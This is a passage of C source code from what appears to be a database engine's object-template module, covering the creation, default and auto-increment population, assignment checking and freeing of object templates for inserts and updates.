&& db_get_set (assign->variable) != NULL)\n\t {\n\t /* must go through and free any elements that may be template pointers */\n\t setref = db_get_set (assign->variable);\n\t if (setref->set != NULL)\n\t\t{\n\t\t set_size = setobj_size (setref->set);\n\t\t for (i = 0; i < set_size; i++)\n\t\t {\n\t\t setobj_get_element_ptr (setref->set, i, &value);\n\t\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t\t{\n\t\t\t obt_free_template ((OBJ_TEMPLATE *) db_get_pointer (value));\n\t\t\t db_make_pointer (value, NULL);\n\t\t\t}\n\t\t }\n\t\t}\n\t }\n\n\t (void) pr_free_ext_value (assign->variable);\n\n\t if (assign->old_value != NULL)\n\t {\n\t (void) pr_free_ext_value (assign->old_value);\n\t }\n\t}\n\n (void) area_free (Assignment_area, assign);\n }\n}\n\n/*\n * obt_free_template - This frees a hierarchical object template.\n * return: none\n * template(in): object template\n *\n * Note :\n * It will be called by obt_update when the template has been applied\n * or can be called by obt_quit to abort the creation of the template.\n * Since the template can contain circular references, must be careful and\n * use a traversal flag in each template.\n *\n */\n\nstatic void\nobt_free_template (OBJ_TEMPLATE * template_ptr)\n{\n OBJ_TEMPASSIGN *a;\n int i;\n\n if (!template_ptr->traversed)\n {\n template_ptr->traversed = 1;\n\n for (i = 0; i < template_ptr->nassigns; i++)\n\t{\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t {\n\t continue;\n\t }\n\n\t if (a->obj != NULL)\n\t {\n\t obt_free_template (a->obj);\n\t }\n\n\t obt_free_assignment (a);\n\t}\n\n if (template_ptr->assignments)\n\t{\n\t free_and_init (template_ptr->assignments);\n\t}\n\n (void) area_free (Template_area, template_ptr);\n }\n}\n\n/*\n * populate_auto_increment - This populates a template with the\n * auto_increment values for a class.\n * return: error code\n * template(in): template to fill out\n *\n * Note :\n * This is necessary for INSERT templates. The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name. we don't generate an error because its ok to override\n * a auto increment value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given.\n *\n */\n\nstatic int\npopulate_auto_increment (OBJ_TEMPLATE * template_ptr)\n{\n SM_ATTRIBUTE *att;\n OBJ_TEMPASSIGN *a, *exists;\n SM_CLASS *class_;\n int error = NO_ERROR;\n DB_VALUE val;\n DB_DATA_STATUS data_status;\n char auto_increment_name[AUTO_INCREMENT_SERIAL_NAME_MAX_LENGTH];\n MOP serial_class_mop = NULL, serial_mop;\n DB_IDENTIFIER serial_obj_id;\n const char *class_name;\n int cached_num;\n\n if (template_ptr->is_class_update)\n {\n return error;\n }\n\n class_ = template_ptr->class_;\n\n for (att = class_->ordered_attributes; att != NULL; att = att->order_link)\n {\n if (!(att->flags & SM_ATTFLAG_AUTO_INCREMENT))\n\t{\n\t continue;\n\t}\n\n if (att->auto_increment == NULL)\n\t{\n\t if (serial_class_mop == NULL)\n\t {\n\t serial_class_mop = sm_find_class (CT_SERIAL_NAME);\n\t }\n\n\t class_name = sm_get_ch_name (att->class_mop);\n\t if (class_name == NULL)\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t goto auto_increment_error;\n\t }\n\n\t /* get original class's serial object */\n\t SET_AUTO_INCREMENT_SERIAL_NAME (auto_increment_name, class_name, att->header.name);\n\t serial_mop = do_get_serial_obj_id (&serial_obj_id, serial_class_mop, auto_increment_name);\n\t if (serial_mop == NULL)\n\t {\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_ATTRIBUTE, 1, auto_increment_name);\n\t goto auto_increment_error;\n\t }\n\n\t att->auto_increment = serial_mop;\n\t}\n\n exists = template_ptr->assignments[att->order];\n if (exists != NULL)\n\t{\n\t if (exists->variable == NULL || !DB_IS_NULL (exists->variable))\n\t {\n\t continue;\n\t }\n\t}\n\n a = obt_make_assignment (template_ptr, att);\n if (a == NULL)\n\t{\n\t goto auto_increment_error;\n\t}\n\n a->is_auto_increment = 1;\n a->variable = pr_make_ext_value ();\n\n if (a->variable == NULL)\n\t{\n\t goto auto_increment_error;\n\t}\n\n if (do_get_serial_cached_num (&cached_num, att->auto_increment) != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n\n db_make_null (&val);\n /* Do not update LAST_INSERT_ID during executing a trigger. */\n if (do_Trigger_involved == true || obt_Last_insert_id_generated == true)\n\t{\n\t error = serial_get_next_value (&val, &att->auto_increment->oid_info.oid, cached_num, 1, GENERATE_SERIAL);\n\t}\n else\n\t{\n\t error =\n\t serial_get_next_value (&val, &att->auto_increment->oid_info.oid, cached_num, 1, GENERATE_AUTO_INCREMENT);\n\t if (error == NO_ERROR)\n\t {\n\t obt_Last_insert_id_generated = true;\n\t }\n\t}\n if (error != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n\n db_value_domain_init (a->variable, att->type->id, att->domain->precision, att->domain->scale);\n\n (void) numeric_db_value_coerce_from_num (&val, a->variable, &data_status);\n if (data_status != NO_ERROR)\n\t{\n\t goto auto_increment_error;\n\t}\n else\n\t{\n\t template_ptr->is_autoincrement_set = 1;\n\t}\n }\n\n return error;\n\nauto_increment_error:\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * populate_defaults - This populates a template with the default values\n * for a class.\n * returns: error code\n * template(in): template to fill out\n *\n * Note :\n * This is necessary for INSERT templates. The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name, we don't generate an error because its ok to override\n * a default value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given and the default is\n * ignored.\n *\n */\n\nstatic int\npopulate_defaults (OBJ_TEMPLATE * template_ptr)\n{\n SM_ATTRIBUTE *att, *base_att;\n OBJ_TEMPASSIGN *a, *exists;\n SM_CLASS *class_;\n DB_VALUE base_value;\n const char *base_name;\n\n db_make_null (&base_value);\n\n if (!template_ptr->is_class_update)\n {\n class_ = template_ptr->class_;\n\n if (template_ptr->base_class != NULL)\n\t{\n\t /*\n\t * first populate with the transformed default values of the\n\t * virtual class\n\t */\n\t for (att = template_ptr->class_->attributes; att != NULL; att = (SM_ATTRIBUTE *) att->header.next)\n\t {\n\n\t /* only update the attribute if it is updatable */\n\t if (mq_is_updatable_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj))\n\t\t{\n\t\t if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj,\n\t\t\t\t\t &att->default_value.value, &base_value, &base_name, DB_AUTH_INSERT))\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\n\t\t /* find the associated attribute definition in the base class */\n\t\t if (obt_find_attribute (template_ptr, 1, base_name, &base_att))\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\n\t\t exists = template_ptr->assignments[base_att->order];\n\t\t /*\n\t\t * if the tranformed virtual default is non-NULL we use it,\n\t\t * if the underlying base default is non-NULL, we let the virtual\n\t\t * default override it to NULL\n\t\t */\n\n\t\t if (exists == NULL && (!DB_IS_NULL (&base_value) || !DB_IS_NULL (&base_att->default_value.value)))\n\t\t {\n\t\t /* who owns base_value ? */\n\t\t a = obt_make_assignment (template_ptr, base_att);\n\t\t if (a == NULL)\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t a->is_default = 1;\n\t\t a->variable = pr_make_ext_value ();\n\t\t if (a->variable == NULL)\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t if (pr_clone_value (&base_value, a->variable))\n\t\t\t{\n\t\t\t goto memory_error;\n\t\t\t}\n\t\t }\n\t\t}\n\t }\n\n\t /*\n\t * change the class pointer to reference the base class rather\n\t * than the virtual class\n\t */\n\t class_ = template_ptr->base_class;\n\t}\n\n /*\n * populate with the standard default values, ignore duplicate\n * assignments if the virtual class has already supplied\n * a value for these.\n */\n for (att = class_->attributes; att != NULL; att = (SM_ATTRIBUTE *) att->header.next)\n\t{\n\t /*\n\t * can assume that the type is compatible and does not need\n\t * to be coerced\n\t */\n\n\t if (DB_VALUE_TYPE (&att->default_value.value) != DB_TYPE_NULL)\n\t {\n\n\t exists = template_ptr->assignments[att->order];\n\n\t if (exists == NULL)\n\t\t{\n\t\t a = obt_make_assignment (template_ptr, att);\n\t\t if (a == NULL)\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t a->is_default = 1;\n\t\t a->variable = pr_make_ext_value ();\n\t\t if (a->variable == NULL)\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t /* would be nice if we could avoid copying here */\n\t\t if (pr_clone_value (&att->default_value.value, a->variable))\n\t\t {\n\t\t goto memory_error;\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return (NO_ERROR);\n\nmemory_error:\n /*\n * Here we couldn't allocate sufficient memory for the template and its\n * values. Probably the template should be marked as invalid and\n * the caller be forced to throw it away and start again since\n * its current state is unknown.\n */\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * obt_def_object - This initializes a new template for an instance of\n * the given class.\n * return: new template\n * class(in): class of the new object\n *\n * Note :\n * This template can then be populated with assignments and given\n * to obt_update to create the instances.\n *\n */\n\nOBJ_TEMPLATE *\nobt_def_object (MOP class_mop)\n{\n OBJ_TEMPLATE *template_ptr = NULL;\n int is_class = locator_is_class (class_mop, DB_FETCH_CLREAD_INSTWRITE);\n\n if (is_class < 0)\n {\n return NULL;\n }\n if (!is_class)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_NOT_A_CLASS, 0);\n }\n else\n {\n template_ptr = make_template (NULL, class_mop);\n }\n\n return template_ptr;\n}\n\n/*\n * obt_edit_object - This is used to initialize an editing template\n * on an existing object.\n *\n * returns: template\n * object(in): existing instance\n *\n */\n\nOBJ_TEMPLATE *\nobt_edit_object (MOP object)\n{\n OBJ_TEMPLATE *template_ptr = NULL;\n int is_class = locator_is_class (object, DB_FETCH_CLREAD_INSTWRITE);\n\n if (is_class < 0)\n {\n return NULL;\n }\n if (is_class)\n {\n /*\n * create a class object template, these are only allowed to\n * update class attributes\n */\n template_ptr = make_template (object, object);\n }\n else if (!object->is_temp)\n {\n DB_OBJECT *class_;\n /*\n * Need to make sure we have the class accessible, don't just\n * dereference obj->class. This gets a read lock early but that's ok\n * since we know we're dealing with an instance here.\n * Should be handling this inside make_template.\n */\n class_ = sm_get_class (object);\n if (class_ != NULL)\n\t{\n\t template_ptr = make_template (object, class_);\n\t}\n }\n\n else\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_TEMP_OBJECT, 0);\n }\n\n return template_ptr;\n}\n\n/*\n * obt_quit - This is used to abort the creation of an object template\n * and release all the allocated storage.\n * return: error code\n * template(in): template to throw away\n *\n */\n\nint\nobt_quit (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr != NULL)\n {\n obt_free_template (template_ptr);\n }\n\n return NO_ERROR;\n}\n\n/*\n * obt_assign - This is used to assign a value to an attribute\n * in an object template.\n * return: error code\n * template(in): object template\n * att(in):\n * base_assignment(in): non-zero if attribute/value are base class values.\n * value(in): value to assign\n * valid(in):\n *\n * Note:\n * The usual semantic checking on assignment will be performed and\n * an error returned if the assignment would be invalid.\n * If the base_assignment flag is zero (normal), the name/value pair\n * must correspond to the virtual class definition and translation\n * will be performed if this is a template on a vclass. If the\n * base_assignment flag is non-zero, the name/value pair are assumed\n * to correspond to the base class and translation is not performed.\n * If this is not a template on a virtual class, the flag has\n * no effect.\n */\n\nint\nobt_assign (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, DB_VALUE * value,\n\t SM_VALIDATION * valid)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *assign;\n DB_VALUE *actual, base_value;\n const char *base_name;\n DB_AUTH auth;\n DB_OBJECT *object;\n\n db_make_null (&base_value);\n\n if ((template_ptr == NULL) || (att == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n goto error_exit;\n }\n\n if (validate_template (template_ptr))\n {\n goto error_exit;\n }\n\n if (!base_assignment && template_ptr->base_class != NULL\n /* Don't translate class attributes */\n && template_ptr->object != template_ptr->classobj)\n {\n /*\n * it's virtual, we could check for assignment validity before calling\n * the value translator\n */\n\n auth = (template_ptr->object == NULL) ? DB_AUTH_INSERT : DB_AUTH_UPDATE;\n\n if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj, value,\n\t\t\t &base_value, &base_name, auth))\n\t{\n\t goto error_exit;\n\t}\n\n /* find the associated attribute definition in the base class */\n if (obt_find_attribute (template_ptr, 1, base_name, &att))\n\t{\n\t goto error_exit;\n\t}\n\n /* switch to the translated value, who owns this ? */\n value = &base_value;\n }\n\n /* check for duplicate assignments */\n assign = NULL;\n if (template_ptr->assignments)\n {\n assign = template_ptr->assignments[att->order];\n }\n\n if (assign)\n {\n if (template_ptr->discard_on_finish)\n\t{\n\t ERROR1 (error, ER_OBJ_DUPLICATE_ASSIGNMENT, att->header.name);\n\t goto error_exit;\n\t}\n }\n\n /* check assignment validity */\n object = OBT_BASE_OBJECT (template_ptr);\n actual = obt_check_assignment (att, value, valid, template_ptr->force_check_not_null);\n if (actual == NULL)\n {\n goto error_exit;\n }\n else\n {\n assign = obt_make_assignment (template_ptr, att);\n if (assign == NULL)\n\t{\n\t goto error_exit;\n\t}\n }\n\n if (actual != value)\n {\n if (assign->variable)\n\t{\n\t pr_free_ext_value (assign->variable);\n\t}\n assign->variable = actual;\n }\n else\n {\n if (assign->variable)\n\t{\n\t /*\n\t *\n\t * Clear the contents, but recycle the container.\n\t */\n\t (void) pr_clear_value (assign->variable);\n\t}\n else\n\t{\n\t assign->variable = pr_make_ext_value ();\n\t if (assign->variable == NULL)\n\t {\n\t goto error_exit;\n\t }\n\t}\n /*\n *\n * Note that this copies the set value, might not want to do this\n * when called by the interpreter under controlled conditions,\n *\n * !!! See about optimizing this so we don't do so much set copying !!!\n */\n error = pr_clone_value (value, assign->variable);\n }\n\n return error;\n\nerror_exit:\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n}\n\n/*\n * obt_assign_obt - This is used to assign another object template as\n * the value of an attribute in an object template\n * return: error code\n * template(in): object template\n * att(in):\n * base_assignment(in): non-zero if base_class assignment\n * value(in): nested object template to assign\n *\n * Note:\n * This is the way that hierarchies of nested objects are specified\n * using templates.\n * See the description of obt_assign() for more information\n * on the meaning of the base_assignment flag.\n * NOTE: obt_set_obt & obt_assign_obt were split to be consistent\n * with obt_set/obt_assign but we don't currently have a need\n * to use obt_assign_obt with a non-zero value for base_assignment.\n *\n */\n\nstatic int\nobt_assign_obt (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, OBJ_TEMPLATE * value)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *assign;\n DB_VALUE dummy_value, base_value;\n const char *base_name;\n DB_AUTH auth;\n\n db_make_null (&base_value);\n db_make_null (&dummy_value);\n\n if (value == NULL)\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n return error;\n }\n\n if (!base_assignment && template_ptr->base_class != NULL)\n {\n auth = (template_ptr->object == NULL) ? DB_AUTH_INSERT : DB_AUTH_UPDATE;\n if (mq_update_attribute (template_ptr->classobj, att->header.name, template_ptr->base_classobj, &dummy_value,\n\t\t\t &base_value, &base_name, auth))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n /* find the associated attribute definition in the base class */\n if (obt_find_attribute (template_ptr, 1, base_name, &att))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n }\n\n if (att->domain->type != tp_Type_object)\n {\n ERROR3 (error, ER_OBJ_ATTRIBUTE_TYPE_CONFLICT, att->header.name, att->domain->type->name, tp_Type_object->name);\n }\n else\n {\n /* check duplicate assigmnent */\n assign = template_ptr->assignments[att->order];\n if (assign != NULL && template_ptr->discard_on_finish)\n\t{\n\t ERROR1 (error, ER_OBJ_DUPLICATE_ASSIGNMENT, att->header.name);\n\t}\n else\n\t{\n\t /*\n\t * obt_check_assignment doesn't accept templates, this is a rather\n\t * controled condition, the only thing we need to check for\n\t * is a valid class hierarchy\n\t */\n\t if (!sm_check_class_domain (att->domain, value->classobj))\n\t {\n\t /* if we don't free value now, it will leak */\n\t obt_free_template (value);\n\t ERROR1 (error, ER_OBJ_DOMAIN_CONFLICT, att->header.name);\n\t }\n\t else if (sm_is_reuse_oid_class (value->classobj))\n\t {\n\t obt_free_template (value);\n\t ERROR0 (error, ER_REFERENCE_TO_NON_REFERABLE_NOT_ALLOWED);\n\t }\n\t else\n\t {\n\t assign = obt_make_assignment (template_ptr, att);\n\t if (assign == NULL)\n\t\t{\n\t\t assert (er_errid () != NO_ERROR);\n\t\t error = er_errid ();\n\t\t}\n\t else\n\t\t{\n\t\t assign->obj = value;\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_set -\n * return: error code\n * template(in): attname\n * attname(in): value\n * value(in):\n *\n * Note:\n * This is just a shell around obt_assign that doesn't\n * make the base_assignment flag public.\n * Recognize the value type DB_TYPE_POINTER as meaning the pointer\n * is another template rather than an object.\n */\n\nint\nobt_set (OBJ_TEMPLATE * template_ptr, const char *attname, DB_VALUE * value)\n{\n int error = NO_ERROR;\n SM_ATTRIBUTE *att;\n\n if ((template_ptr == NULL) || (attname == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n }\n else\n {\n if (validate_template (template_ptr))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (obt_find_attribute (template_ptr, 0, attname, &att))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t{\n\t error = obt_assign_obt (template_ptr, att, 0, (OBJ_TEMPLATE *) db_get_pointer (value));\n\t}\n else\n\t{\n\t error = obt_assign (template_ptr, att, 0, value, NULL);\n\t}\n }\n\n return error;\n}\n\n/* temporary backward compatibility */\n/*\n * obt_set_obt -\n * return: error code\n * template(in):\n * attname(in):\n * value(in):\n *\n */\nint\nobt_set_obt (OBJ_TEMPLATE * template_ptr, const char *attname, OBJ_TEMPLATE * value)\n{\n DB_VALUE v;\n\n db_make_pointer (&v, value);\n\n return (obt_set (template_ptr, attname, &v));\n}\n\n/*\n * obt_set_desc - This is similar to obt_set() except that\n * the attribute is identified through a descriptor rather than\n * an attribute name.\n * return: error code\n * template(in): object template\n * desc(in): attribute descriptor\n * value(in): value to assign\n *\n */\n\nint\nobt_desc_set (OBJ_TEMPLATE * template_ptr, SM_DESCRIPTOR * desc, DB_VALUE * value)\n{\n int error = NO_ERROR;\n SM_CLASS *class_;\n SM_ATTRIBUTE *att;\n\n if ((template_ptr == NULL) || (desc == NULL) || (value == NULL))\n {\n ERROR0 (error, ER_OBJ_INVALID_ARGUMENTS);\n }\n else\n {\n if (validate_template (template_ptr))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n /*\n * Note that we pass in the outer class MOP rather than an object\n * since we don't necessarily have an object at this point.\n */\n if (sm_get_descriptor_component (template_ptr->classobj, desc, 1, &class_, (SM_COMPONENT **) (&att)))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n\n if (DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t{\n\t error = obt_assign_obt (template_ptr, att, 0, (OBJ_TEMPLATE *) db_get_pointer (value));\n\t}\n else\n\t{\n\t error = obt_assign (template_ptr, att, 0, value, desc->valid);\n\t}\n }\n\n return error;\n}\n\n\n/*\n * create_template_object -\n * return: MOP of new object\n * template(in):\n */\n\n\nstatic MOP\ncreate_template_object (OBJ_TEMPLATE * template_ptr)\n{\n MOP mop;\n char *obj;\n SM_CLASS *class_;\n\n mop = NULL;\n\n /* must flag this condition */\n ws_class_has_object_dependencies (template_ptr->classobj);\n\n class_ = template_ptr->class_;\n\n /*\n * NOTE: garbage collection can occur in either the call to locator_add_instance\n * or vid_add_virtual_instance (which calls locator_add_instance). The object\n * we're caching can't contain any object references that aren't rooted\n * elsewhere. Currently this is the case since the object is empty\n * and will be populated later with information from the template which IS\n * a GC root.\n */\n if (class_->class_type != SM_VCLASS_CT)\n {\n obj = obj_alloc (class_, 0);\n if (obj != NULL)\n\t{\n\t mop = locator_add_instance (obj, template_ptr->classobj);\n\t}\n }\n else\n {\n /* virtual instance, base_class must be supplied */\n obj = obj_alloc (template_ptr->base_class, 0);\n if (obj != NULL)\n\t{\n\t /* allocate 2 MOP's */\n\t mop =\n\t vid_add_virtual_instance (obj, template_ptr->classobj, template_ptr->base_classobj,\n\t\t\t\t template_ptr->base_class);\n\t}\n }\n\n if (mop != NULL)\n {\n template_ptr->object = mop;\n\n /* set the label if one is defined */\n if (template_ptr->label != NULL)\n\t{\n\t db_make_object (template_ptr->label, mop);\n\t}\n\n /* if this is a virtual instance insert, cache the base instance too */\n if (template_ptr->base_class != NULL)\n\t{\n\n\t /* probably don't need the first test in the if at this point */\n\t if (mop->is_vid && !vid_is_base_instance (mop))\n\t {\n\t template_ptr->base_object = vid_get_referenced_mop (mop);\n\t }\n\t else\n\t {\n\t template_ptr->base_object = mop;\n\t }\n\t}\n }\n\n return mop;\n}\n\n/*\n * access_object - This is a preprocessing function called by\n * obt_apply_assignments.\n * return: error code\n * template(in): object template\n * object(in):\n * objptr(out): pointer to instance (returned)\n *\n * Note:\n * It ensures that the object associated with the template is locked\n * and created if necessary.\n */\nstatic int\naccess_object (OBJ_TEMPLATE * template_ptr, MOP * object, MOBJ * objptr)\n{\n int error = NO_ERROR;\n MOP classobj, mop;\n MOBJ obj;\n\n /*\n * The class and instance was already locked&fetched when the template was created.\n * The class pointer was cached since they are always pinned.\n * To avoid pinning the instance through a scope we don't control,\n * they aren't pinned during make_template but rather are \"fetched\"\n * again and pinned during obt_apply_assignments()\n * Authorization was checked when the template was created so don't\n * do it again.\n */\n\n if (template_ptr->is_class_update)\n {\n /* object is the class but there is no memory pointer */\n *object = OBT_BASE_CLASSOBJ (template_ptr);\n *objptr = NULL;\n return NO_ERROR;\n }\n\n obj = NULL;\n\n /*\n * First, check to see if this is an INSERT template and if so, create\n * the new object.\n */\n if (template_ptr->object == NULL)\n {\n if (create_template_object (template_ptr) == NULL)\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n }\n\n /*\n * Now, fetch/lock the instance and mark the class.\n * At this point, we want to be dealing with only the base object.\n */\n\n if (template_ptr->base_classobj != NULL)\n {\n classobj = template_ptr->base_classobj;\n mop = template_ptr->base_object;\n }\n else\n {\n classobj = template_ptr->classobj;\n mop = template_ptr->object;\n }\n\n if (mop != NULL)\n {\n error = au_fetch_instance_force (mop, &obj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION);\n if (error == NO_ERROR)\n\t{\n\t /* must call this when updating instances */\n\t ws_class_has_object_dependencies (classobj);\n\t}\n }\n\n if (obj == NULL)\n {\n assert (er_errid () != NO_ERROR);\n error = er_errid ();\n }\n else\n {\n mop->pruning_type = template_ptr->pruning_type;\n *object = mop;\n *objptr = obj;\n }\n\n return error;\n}\n\n/*\n * obt_convert_set_templates - Work function for obt_apply_assignments.\n * return: error code\n * setref(in): set pointer from a template\n * check_uniques(in):\n *\n * Note:\n * This will iterate through the elements of a set (or sequence) and\n * convert any elements that are templates in to actual instances.\n * It will recursively call obt_apply_assignments for the templates\n * found in the set.\n */\n\nstatic int\nobt_convert_set_templates (SETREF * setref, int check_uniques)\n{\n int error = NO_ERROR;\n DB_VALUE *value = NULL;\n OBJ_TEMPLATE *template_ptr;\n int i, set_size;\n SETOBJ *set;\n\n if (setref != NULL)\n {\n set = setref->set;\n if (set != NULL)\n\t{\n\t set_size = setobj_size (set);\n\t for (i = 0; i < set_size && error == NO_ERROR; i++)\n\t {\n\t setobj_get_element_ptr (set, i, &value);\n\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t{\n\t\t /* apply the template for this element */\n\t\t template_ptr = (OBJ_TEMPLATE *) db_get_pointer (value);\n\t\t error = obt_apply_assignments (template_ptr, check_uniques, 1);\n\t\t /* 1 means do eager flushing of (set-nested) proxy objects */\n\t\t if (error == NO_ERROR && template_ptr != NULL)\n\t\t {\n\t\t db_make_object (value, template_ptr->object);\n\t\t obt_free_template (template_ptr);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_final_check_set - This is called when a set value is encounterd in\n * a template that is in the final semantic checking phase.\n * return: error code\n * setref(in): object template that provked this call\n * has_uniques(in):\n *\n * Note:\n * We must go through the set and look for each element that is itself\n * a template for a new object.\n * When these are found, recursively call obt_final_check to make sure\n * these templates look ok.\n */\n\nstatic int\nobt_final_check_set (SETREF * setref, int *has_uniques)\n{\n int error = NO_ERROR;\n DB_VALUE *value = NULL;\n OBJ_TEMPLATE *template_ptr;\n SETOBJ *set;\n int i, set_size;\n\n if (setref != NULL)\n {\n set = setref->set;\n if (set != NULL)\n\t{\n\t set_size = setobj_size (set);\n\t for (i = 0; i < set_size && error == NO_ERROR; i++)\n\t {\n\t setobj_get_element_ptr (set, i, &value);\n\t if (value != NULL && DB_VALUE_TYPE (value) == DB_TYPE_POINTER)\n\t\t{\n\t\t template_ptr = (OBJ_TEMPLATE *) db_get_pointer (value);\n\t\t error = obt_final_check (template_ptr, 1, has_uniques);\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_check_missing_assignments - This checks a list of attribute definitions\n * against a template and tries to locate missing\n * assignments in the template that are required\n * in order to process an insert template.\n * return: error code\n * template(in): template being processed\n *\n * Note:\n * This includes missing initializers for attributes that are defined\n * to be NON NULL.\n * It also includes attributes defined with a VID flag.\n */\n\nint\nobt_check_missing_assignments (OBJ_TEMPLATE * template_ptr)\n{\n int error = NO_ERROR;\n SM_CLASS *class_;\n SM_ATTRIBUTE *att;\n OBJ_TEMPASSIGN *ass;\n\n /* only do this if its an insert template */\n\n if (template_ptr->object == NULL)\n {\n /* use the base_class if this is a virtual class insert */\n class_ = OBT_BASE_CLASS (template_ptr);\n\n for (att = class_->ordered_attributes; att != NULL && error == NO_ERROR; att = att->order_link)\n\t{\n\n\t if (((att->flags & SM_ATTFLAG_NON_NULL) && DB_IS_NULL (&att->default_value.value)\n\t && att->default_value.default_expr.default_expr_type == DB_DEFAULT_NONE)\n\t || (att->flags & SM_ATTFLAG_VID))\n\t {\n\t ass = template_ptr->assignments[att->order];\n\t if (ass == NULL)\n\t\t{\n\t\t if (att->flags & SM_ATTFLAG_NON_NULL)\n\t\t {\n\t\t ERROR1 (error, ER_OBJ_MISSING_NON_NULL_ASSIGN, att->header.name);\n\t\t }\n\t\t if (att->flags & SM_ATTFLAG_VID)\n\t\t {\n\t\t ERROR1 (error, ER_SM_OBJECT_ID_NOT_SET, sm_ch_name ((MOBJ) (template_ptr->class_)));\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_final_check\n * return: error code\n * template(in): object template\n * check_non_null(in):\n * has_uniques(in):\n *\n */\n\nstatic int\nobt_final_check (OBJ_TEMPLATE * template_ptr, int check_non_null, int *has_uniques)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *a;\n int i;\n\n /* have we already been here ? */\n if (template_ptr->traversal == obj_Template_traversal)\n {\n return NO_ERROR;\n }\n template_ptr->traversal = obj_Template_traversal;\n\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (!template_ptr->is_class_update)\n {\n\n /*\n * We locked the object when the template was created, this\n * should still be valid. If not, it should have been detected\n * by validate_template above.\n * Could create the new instances here but wait for a later step.\n */\n\n /*\n * Check missing assignments on an insert template, should be able\n * to optimize this, particularly when checking for uninitialized\n * shared attributes.\n */\n if (template_ptr->object == NULL)\n\t{\n\t if (obt_Enable_autoincrement == true && populate_auto_increment (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\n\t if (populate_defaults (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\n\t if (check_non_null && obt_check_missing_assignments (template_ptr))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t }\n\t}\n\n /* does this template have uniques? */\n if (template_ptr->uniques_were_modified)\n\t{\n\t *has_uniques = 1;\n\t}\n\n /* this template looks ok, recursively go through the sub templates */\n for (i = 0; i < template_ptr->nassigns && error == NO_ERROR; i++)\n\t{\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t {\n\t continue;\n\t }\n\t if (a->obj != NULL)\n\t {\n\t /* the non-null flag is only used for the outermost template */\n\t error = obt_final_check (a->obj, 1, has_uniques);\n\t }\n\t else\n\t {\n\t DB_TYPE av_type;\n\n\t av_type = DB_VALUE_TYPE (a->variable);\n\t if (TP_IS_SET_TYPE (av_type))\n\t\t{\n\t\t error = obt_final_check_set (db_get_set (a->variable), has_uniques);\n\t\t}\n\t }\n\t}\n\n /* check unique_constraints, but only if not disabled */\n /*\n * test & set interface doesn't work right now, full savepoints are instead\n * being performed in obt_update_internal.\n */\n }\n return (error);\n}\n\n/*\n * obt_apply_assignment - This is used to apply the assignments in an object\n * template after all of the appropriate semantic\n * checking has taken place.\n * return: error code\n * op(in): class or instance pointer\n * att(in): attribute descriptor\n * mem(in): instance memory pointer (instance attribute only)\n * value(in): value to assign\n * check_uniques(in):\n *\n * Note:\n * This used to be a lot more 